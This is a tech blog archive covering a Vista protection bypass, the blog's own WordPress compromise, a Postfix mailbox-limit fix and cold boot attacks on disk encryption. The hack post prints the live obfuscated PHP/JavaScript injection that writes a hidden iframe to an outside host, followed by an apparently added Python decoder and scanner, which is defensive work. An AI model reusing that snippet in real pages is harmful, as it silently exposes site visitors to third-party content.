Category Archives: System

Windows Vista memory protection : defeated ?

It seems so, at least according to some researchers who demonstrated it at the Black Hat conference.

Mark Dowd (IBM) and Alexander Sotirov (VMware) found a way to bypass the memory protection implemented in Vista and inject malicious instructions into Internet Explorer. They were able to copy any content wherever they wished on the disk.

In particular, their paper should make for interesting reading, even if it is not as simple as they say – at least not for me.

Hacked !

This blog got hacked yesterday.

It looks like some spammer managed to inject PHP code into almost all of the *.php files of WordPress.
It was not the classic SQL injection that is usually used to publish a malicious post.

The following code was added :

<?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

Continue reading
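To understand what the injected snippet actually does and to find every file it touched, a defender needs two things: a decoder for the shift-by-2 obfuscation used by the count() function, and a scan of the WordPress tree for that marker. The following is an added example, not code from the original post or from WordPress; the encoded payload is copied from the snippet quoted above, and the directory tree it scans is constructed on the fly in a temporary directory.

```python
import os
import re
import tempfile

# Obfuscation marker used by the injected snippet quoted above: the payload is stored
# with every character code shifted up by 2 and shifted back at run time.
INJECTION_MARKER = re.compile(r'String\.fromCharCode\(n\s*-\s*\(2\)\)')

# Encoded payload copied from the injected snippet. In the PHP source it sits inside a
# single-quoted string, so each \" reaches the JavaScript engine as an escaped quote
# and decodes to a plain double quote here.
ENCODED_PAYLOAD = ('>khtcog"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr'
                   '"ykfvj?3"jgkijv?3"htcogdqtfgt?2@')


def decode_payload(encoded, shift=2):
    """Mirror the injected count() function: shift every character code down by `shift`."""
    return ''.join(chr(ord(c) - shift) for c in encoded)


def find_injected_files(root):
    """Return sorted paths of *.php files under `root` containing the obfuscation marker."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith('.php'):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding='utf-8', errors='replace') as fh:
                if INJECTION_MARKER.search(fh.read()):
                    hits.append(path)
    return sorted(hits)


def demo():
    """Build a constructed, throw-away WordPress-like tree and run both checks on it."""
    # Same shape as the snippet quoted in the post, with the payload re-escaped for PHP.
    injected = ('<?php echo \'<script type="text/javascript">function count(str){'
                'var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); '
                'res += String.fromCharCode(n - (2)); } return res; }; '
                'document.write(count("' + ENCODED_PAYLOAD.replace('"', '\\"')
                + '"));</script>\';?>\n')
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, 'wp-includes'))
        files = {
            'index.php': injected + '<?php /* constructed */ ?>\n',
            os.path.join('wp-includes', 'version.php'): injected + '<?php /* constructed */ ?>\n',
            'wp-config-sample.php': '<?php /* constructed clean file */ ?>\n',
        }
        for rel, body in files.items():
            with open(os.path.join(root, rel), 'w', encoding='utf-8') as fh:
                fh.write(body)
        hits = [os.path.relpath(p, root) for p in find_injected_files(root)]
    return decode_payload(ENCODED_PAYLOAD), hits


if __name__ == '__main__':
    decoded, infected = demo()
    print('payload decodes to:', decoded)
    print('infected files:', infected)
```

Decoding shows the snippet writes a 1x1 hidden iframe pointing at a third-party host, which is why the blog looked normal while serving it to every visitor. The marker regex is deliberately narrow (it matches this family of injections only); on a real installation run find_injected_files() against the web root and compare the hits with a clean copy of the same WordPress release before cleaning up.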

Postfix : “error writing message: File too large”

I suddenly started to receive undelivered mail notifications while trying to send messages to a mailbox hosted on my Postfix server.

The cause described in the notification was :

error writing message: File too large

The first thing I did was to check my configuration file, main.cf.
It seemed all right :

[...]
mailbox_size_limit = 0
message_size_limit = 200000000
[...]

Note that “0” means unlimited.
I checked the mailbox in question : it was nearing the size of 50 MB.

I started to think that during some Postfix update, the meaning of the value “0” may have changed.
I tried different values without success.

It was driving me crazy, but after quite a long time spent on Google I finally found the trick, which is just a single line to add to main.cf :

virtual_mailbox_limit = 0

Indeed, my mail accounts are virtual users ! I had just never imagined there was a different setting for virtual users (which can be a convenient setting in some cases).
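The gotcha is that mailbox_size_limit only governs local delivery, while virtual mailboxes are governed by virtual_mailbox_limit, which keeps its Postfix default when it is not set in main.cf. The following added example (not code from the original post or from Postfix) parses a main.cf fragment and predicts which parameter would reject a delivery; the default values are an assumption taken from the postconf(5) documentation, the fragments and the mailbox sizes are constructed, and the domain example.test is a placeholder.

```python
# Postfix built-in defaults, in bytes, for the parameters involved (an assumption taken
# from the postconf(5) documentation, not from the post); the value 0 means "no limit".
POSTFIX_DEFAULTS = {
    'message_size_limit': 10240000,
    'mailbox_size_limit': 51200000,
    'virtual_mailbox_limit': 51200000,
}

# Constructed main.cf fragments: the configuration from the post before and after the fix.
MAIN_CF_BEFORE = """\
# constructed sample, not a real server's configuration
mailbox_size_limit = 0
message_size_limit = 200000000
virtual_mailbox_domains = example.test
"""
MAIN_CF_AFTER = MAIN_CF_BEFORE + "virtual_mailbox_limit = 0\n"


def parse_main_cf(text):
    """Parse 'name = value' lines of a main.cf; comment lines start with '#'.
    Continuation lines (leading whitespace) are folded into the previous value."""
    params = {}
    last = None
    for line in text.splitlines():
        if not line.strip() or line.startswith('#'):
            continue
        if line[0].isspace() and last is not None:
            params[last] += ' ' + line.strip()
            continue
        name, _, value = line.partition('=')
        last = name.strip()
        params[last] = value.strip()
    return params


def effective_limit(params, name):
    """Effective byte limit for `name`: the configured value, else the Postfix default."""
    return int(params.get(name, POSTFIX_DEFAULTS[name]))


def exceeds(size, limit):
    """True when `size` is over `limit`; a limit of 0 never rejects anything."""
    return limit != 0 and size > limit


def delivery_problem(params, mailbox_bytes, message_bytes, virtual):
    """Return the name of the parameter that would make delivery fail, or None.

    Local mailboxes are bounded by mailbox_size_limit, virtual mailboxes by
    virtual_mailbox_limit; the delivery agent enforces that bound as a file size
    limit on the mailbox file, which is what surfaces as 'File too large'."""
    if exceeds(message_bytes, effective_limit(params, 'message_size_limit')):
        return 'message_size_limit'
    box_param = 'virtual_mailbox_limit' if virtual else 'mailbox_size_limit'
    if exceeds(mailbox_bytes + message_bytes, effective_limit(params, box_param)):
        return box_param
    return None


def demo():
    """A mailbox nearing 50 MB receiving a 3 MB message, before and after the fix."""
    mailbox, message = 49000000, 3000000
    before, after = parse_main_cf(MAIN_CF_BEFORE), parse_main_cf(MAIN_CF_AFTER)
    return {
        'virtual_before': delivery_problem(before, mailbox, message, virtual=True),
        'virtual_after': delivery_problem(after, mailbox, message, virtual=True),
        'local_before': delivery_problem(before, mailbox, message, virtual=False),
    }


if __name__ == '__main__':
    for case, culprit in demo().items():
        print(f'{case}: {culprit or "delivered"}')
```

With the default virtual_mailbox_limit of 51200000 bytes, a mailbox nearing 50 MB is exactly where deliveries start to fail, which matches the symptom in the post; the same mailbox served by local delivery would have been fine because mailbox_size_limit was already 0. On a live server, postconf prints the effective value of any parameter, defaults included, so it is a quicker way to spot an unset limit than reading main.cf.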

Cold boot attack, not a threat to Full disk encryption (FDE)

Since the new cold boot attack is in the news, affecting most software encryption solutions, I have been wondering whether it could also affect hardware encryption.

Hardware encryption is provided by a few laptop makers, generally on high-end and business models.

It has much less performance impact than software encryption, and protects the data independently of your system configuration and its partitions.

Full Disk Encryption (FDE) is the name of the so-called hardware encryption technology used by Lenovo on my Thinkpad.

Continue reading

Disk encryption methods : hacked !

Damned !

A team of researchers found a way to defeat all the most common disk encryption methods – including dm-crypt for Linux that I previously described on this blog.

All systems are actually affected, because the attack is low level : it relies on a physical property of RAM chips. After shutdown, with no more power applied, a chip still holds readable data for a few seconds.

The data degrades over time, but if you cool the chip enough, for example with a can of compressed air used for dusting computers, it can be kept readable for several minutes !

The problem for disk encryption is that the decryption key is kept in RAM, and can be stolen that way to read all your data.

The attack would not be so easy in practice if suspend-to-RAM did not exist.

But since many users, including me, rely heavily on suspend-to-RAM with their laptop, this issue is rather problematic…

The team provides a rather impressive video :

I no longer use dm-crypt since my Thinkpad provides hardware encryption, but I now wonder where the key is stored in my case. I don’t think it is in RAM, but I have to check to make sure. I will do it tomorrow, since I need to rest now.